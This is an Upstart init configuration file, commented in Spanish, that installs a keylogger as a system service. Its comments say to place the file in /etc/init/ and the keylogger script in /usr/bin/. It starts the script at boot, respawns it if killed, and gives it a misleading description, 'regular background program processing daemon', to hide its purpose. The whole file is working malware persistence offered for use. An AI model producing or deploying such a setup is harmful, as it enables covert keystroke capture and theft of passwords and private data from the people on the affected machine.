# SERVICIO UPSTART PARA EL ARRANQUE DEL KEYLOGGER
# ===============================================

# meter este fichero, keylogger.conf en /etc/init/
# y el script del keylogger.sh en /usr/bin/

description	"regular background program processing daemon"

start on runlevel [2345]
stop on runlevel [!2345]

expect fork
respawn

exec /usr/bin/keylogger.sh

